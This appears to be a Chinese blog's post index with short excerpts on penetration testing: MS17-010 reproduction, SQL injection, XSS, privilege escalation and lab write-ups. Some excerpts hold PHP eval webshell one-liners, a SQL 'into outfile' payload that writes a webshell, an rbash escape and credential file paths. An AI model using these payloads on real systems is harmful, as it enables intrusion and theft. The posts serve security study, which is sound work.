自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

原创 ms17-010永恒之蓝复现

进入msf,搜索ms17-010模块 查看参数 设置攻击目标 设置攻击模块 设置攻击目标 设置攻击载荷(用于tcp的的反弹shell) 返回shell的IP 开始攻击

2019-10-24 23:25:27 130 0

原创 文件包含-伪协议

文件包含漏洞利用的前提 1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入; 2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问; 在使用文件包含漏洞时,必须要能知道其绝对路径 方法: 在包含文件处,查看其返回的错误的信息 伪协议文...

2019-10-02 16:58:20 1004 0

原创 各业务功能的测试点

0×1登录功能 2 0×2找回密码功能 3 0×3注册功能 4 0×4支付功能 4 0×5账户功能 5 0×6个人中心 5 0×7 评论功能 6 0×8 上传功能 7 0×9 订单功能 7 0×10 收获地址功能 7 0×1登录功能 1、账号密码能否爆破 即验证码是否有效 2...

2019-10-02 16:52:06 310 0

原创 XSS小总结

原理 开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将java...

2019-10-02 16:41:27 128 0

原创 SQL注入小总结

原理 在程序开发时,开发人员没有对可以进行数据库交互的地方进行严格过滤。导致用户在提交数据时,可以将构造的恶意sql语句提交到数据库进行执行。 个人总结:sql注入就是恶意sql语句在数据库被执行 攻击方式(分类、步骤、工具) 分类: 基于位置点 get post ht...

2019-10-02 16:35:52 113 0

原创 信息收集总结

域名相关信息 域名IP、ns、MX、子域名、旁站、C段 nslookup ip 8.8.8.8 获得其域名IP,可多地ping nslookup -qt=mx xupe.edu.cn dnsenum xupt.ed.cn 获得其ns、MX、并判断是否有与传送漏洞 dnsenum ...

2019-10-02 16:27:37 156 0

原创 HTTP状态码的意义

使用ASP.NET/PHP/JSP 或者javascript都会用到http的不同状态,一些常见的状态码为: 200 – 服务器成功返回网页 404 – 请求的网页不存在 503 – 服务不可用 1xx(临时响应) 表示临时响应并需要请求者继续执行操作的状态代码。 代码 说明 100 (继...

2019-09-30 23:05:54 41 0

原创 常见端口漏洞

2019-09-30 23:01:43 93 0

原创 Iis7.0 cgi解析漏洞复现

漏洞形成原因: 漏洞与PHP配置有关,php.ini中的参数cgi.fix_pathinfo参数配置错误导致解析漏洞,开启了cgi.fix_pathinfo php.ini里默认cgi.fix_pathinfo=1,对其进行访问的时候,在URL路径后添加.php后缀名会当做php文件进行解析,漏洞...

2019-09-30 22:23:51 127 0

原创 常用的php一句话木马格式

测试语句 <?php phpinfo();?> 最初语句 <?php @eval($_POST[cmd]);?> <?php @eval($_REQUEST[cmd]);?> 前端的传输方式: GET 数据从url提交 POST 数据采用隐蔽方式提交 REQ...

2019-09-30 22:12:23 2211 0

原创 常见解析漏洞

IIS6.0-文件解析漏洞 IIS6.0-目录解析漏洞 IIS7.0-畸形解析漏洞 apache-%0a解析漏洞 apache-未知后缀名解析漏洞 nginx-访问文件解析漏洞 nginx-畸形解析漏洞 nginx-截断解析漏洞 IIS 6.0 1、目录解析 example:www.xxx.com...

2019-09-30 22:07:01 156 0

原创 DC1靶机

目标探测 因为是在局域网内,所以使用内网扫描 目标已经确定,进行端口扫描 namp -sT -sC -p- -sV -T 3 -sT 全连接 -sC 使用默认的安全脚本 -p- 全端口 -sV 版本探测 -T 时间频率(太快的话,可能什么也扫不到) 根据扫描结果,我们以80端口位突破口 很...

2019-09-30 21:58:18 295 0

原创 为什么大多使用反向shell

反向shell和正向shell的区别 正向shell:控制端主动发起连接去连接被控制端。 反向shell:被控制端主动连接控制端。 在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。会导致通常进入被控制端的数据包会被拦截等原因的无法连接。而被控制端主动向外发送的数据包通常都不会...

2019-09-30 16:14:21 138 0

原创 mysql写入一句话的方式

一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTuto...

2019-09-30 14:55:45 154 0

原创 Linux突破受限shell使用sudo提权

使用ssh登录 restricted 受限的 受限的shell命令,rbash,百度搜索rbash,发现有绕过方法,进行查找,并尝试 Vi编辑,输入,到了/bin/bash BASH_CMDS[a]=/bin/sh;a /bin/bash 此时就变成了bash的shell 然后导入环境变量,目...

2019-09-15 17:23:27 278 0

原创 wpscan更新失败

wpscan --update 在线更新 更新失败 那就将包下载到本地更新 wget http://blog.dsb.ink/wpscan/wp.zip unzip wp.zip 将刚刚wpscan的解压文件 放到apache的目录里 设置wpscan的更新配置文件 打开本地的服务器...

2019-09-15 12:00:54 2032 7

原创 Linux配置不当提权-suid提权

攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell 在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样 命令 python -c 'import pty;pty.spawn(...

2019-09-14 22:28:47 613 0

原创 常用配置文件路径

Windows 系统 C:\boot.ini 查看系统版本 C:\windows\system32\inetsrv\MetaBase.xml IIS配置文件 C:\windows\repair\sam 存储Windows系统初次安装的密码 C:\Program Files\my...

2019-09-13 14:23:11 206 0

原创 MYSQL写入一句话的方式

一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "...

2019-09-13 14:21:07 507 0

原创 PHP代码执行函数总结(可以用于制作一句话木马)

PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行...

2019-09-07 09:19:15 302 0

原创 SQL布尔盲注常用语句

过程 1.判断是否存在注入,注入字符型还是数字型 2.猜解当前数据库名 数据库长度→库名 3.数据库中的表名 几个表→长度→名称 4.表中的字段名 字段个数→长度→名称 5.数据 判断 1’ and ‘1’=‘1 1’ and ‘1’='2 2.库名 1’ and length(da...

2019-08-23 16:14:57 714 0

原创 SQL注入常用语句

一、判断类型 用and判断其字符类型 ’ and ‘1’='1 正常返回 ’ and ‘1’='2 页面正常,但是与上个页面相比,没有查询数据(网站没对sql输入做特殊过滤和处理) 字符型 上两条必须是一起判断的 ’ and ‘1’='1 非正常返回,显示错误。...

2019-08-23 16:12:42 79 0

原创 渗透测试---命令执行注入

概述 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内 导致原因 代码过滤不严格 系统漏洞 调用第三方组件 如:php(system(),shell_exec(),exec(),eval())、 java(struts2)、thinkphp(老牌的php框架)等 &...

2019-08-21 11:41:39 535 0

原创 渗透测试---爆破含有token验证

参数选择 必须选择pitchfork模式 设置字典 options设置 开始爆破 结果 爆破成功

2019-08-20 17:27:12 243 0

原创 渗透测试---提权后获取信息

LINUX uname -a 查看当前系统版本、内核等 whoami 查看当前使用的用户 pwd 查看当前所在路径 ifconfig -a 查看网卡信息,IP、MAC等 iptables -L 查看防火墙规则 dpkg -l 查看已经安装的软件 ps -aux 查看进程 ...

2019-08-20 12:04:18 148 0

原创 渗透测试---本地提权

本地提权 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户,不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到...

2019-08-16 17:29:41 77 0

原创 nmap端口扫描常用参数

TCP -sS/sT/sA/sW/sM TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon -sN/sF/sX TCP Null,FIN,and Xmas扫描 ...

2019-08-14 21:55:40 1110 0

原创 nmap主机探测的参数使用

-sn 主机发现(不扫端口),只要有此参数,那么在主机发现时,目标IP为内网时使用ARP协议,目标IP为外网时,使用ICMP和TCP协议 目标为内网 目标为外网 使用的是ICMP协议的echo请求包、时间戳请求包和TCP协议中SYN请求包、ACK请求包 -PE/PP/PM(ICMP协议) 此时使用...

2019-08-13 17:24:53 232 0

原创 vim去除重复行

先sort排序,再去重 :sort //直接排序 :g/^\(.*\)$\n\1$/d //去除重复行 :g/\%(^\1$\n\)\@<=\(.*\)$/d //功能同上,也是去除重复行 :g/\%(^\1\>.*$\n\)\@&...

2019-08-12 20:19:48 196 0

原创 kali添加软件快捷方式

查看软件是否安装 whereis firefox 如果已安装就会有数据返回 查看软件可执行文件的位置 which firefox 打开终端 输入 leafpad 回车 输入以下内容 [Desktop Entry] Version=2333 Name=firefox Name[zh_CN]=f...

2019-08-12 10:22:27 929 0

原创 渗透测试---信息收集(域名信息)

在信息收集中目标的域名相关的信息是很重要的,比如: 注册信息 域名对应的真实IP 域名服务器 邮件服务器 子域名 IP反查 旁站 C段 所要收集的信息及其工具 注册信息----whois、https://www.aizhan.com/、http://www.7c.com...

2019-08-11 22:42:43 251 0

转载 信息收集之DNS信息收集 -- fierce

目录 工具描述 参数解释 爆破子域名 自定义字典爆破子域名 反查指定范围的IP段 反查指定域名附近的IP段 反查指定域名所在的C段IP 扫描优化:自定义超时时间、多线程 工具描述 Fierce是一款IP、域名互查的DNS工具,可进行域传送漏洞检测、字典爆破子域名、反查IP段、反查指定域名上下一...

2019-08-10 10:00:00 250 0

转载 Linux开机流程

转载于:https://www.cnblogs.com/shishanyu/p/7966975.html 开机过程指的是从打开计算机电源直到LINUX显示用户登录画面的全过程。分析LINUX开机过程也是深入了解LINUX核心工作原理的一个很好的途径。 启动第一步–加载BIOS 当你打开计算机...

2019-08-08 16:06:12 51 0

原创 iptables中的默认规则

在iptables中默认规则是指filter表中的INPUT、OUTPUT、FORWARD 三条链的规则

2019-08-07 12:17:58 3638 0

原创 mysql数据库的查询

查看表中字段属性 mysql> describe fruits; #fruits表名 增加 INSERT INTO fruits(f_id,s_id,f_name,f_price) VALUES('a1',101,'apple',5.2); ...

2019-08-07 11:34:57 50 0

原创 sed基本用法

1 案例1:sed基本用法 1.1 问题 本案例要求熟悉sed命令的p、d、s等常见操作,并结合正则表达式,完成以下任务: 删除文件中每行的第二个、最后一个字符将文件中每行的第一个、第二个字符互换删除文件中所有的数字为文件中每个大写字母添加括号1.2 方案 ...

2019-08-01 21:11:21 47 0

原创 配置本地yum源

光盘连接、挂载 挂载 mount /dev/sr0 /mnt 修改配置文件 vim etc/yum.repos.d/rhel-source.repo 查看自己要安装的相关yum包 find /mnt -name *名字* 安装 yum -y install bi...

2019-07-31 16:57:58 36 0

原创 Redhat配置静态IP

编辑配置文件 vim /etc/sysconfig/network-scripts/ifcfg-eth1 设置 DEVICE=eth1 HWADDR=00:0C:29:11:1D:4E TYPE=Ethernet ONBOOT=yes BOOTPROTO=static I...

2019-07-31 11:59:18 1149 0

原创 Linux中的AIDE(高级入侵检测环境)

AIDE:Advanced Intrusion Detection Environment,高级入侵检测环境 功能:是目前unix下著名的文件系统完整性检查工具,采用的技术核心是对每个要监控的文件提前产生一个数字签名并保存在系统中,当文件当前数字签名与保留的数字签名不一致时,那么说明我们检测的文件...

2019-07-30 16:16:24 325 0

原创 Linux系统资源管理(二)

iostat iostat:输出CPU和磁盘I/O相关的统计信息 语法:iostat 选项 延迟 计数 参数: -c:仅显示cpu信息 -d:仅显示磁盘信息 -k:以k为单位显示磁盘每秒请求的块数 -t:显示报告生成时间 -p device | all :显示指定或所有的块设备信息...

2019-07-30 13:38:48 37 0

提示
确定要删除当前文章?
取消 删除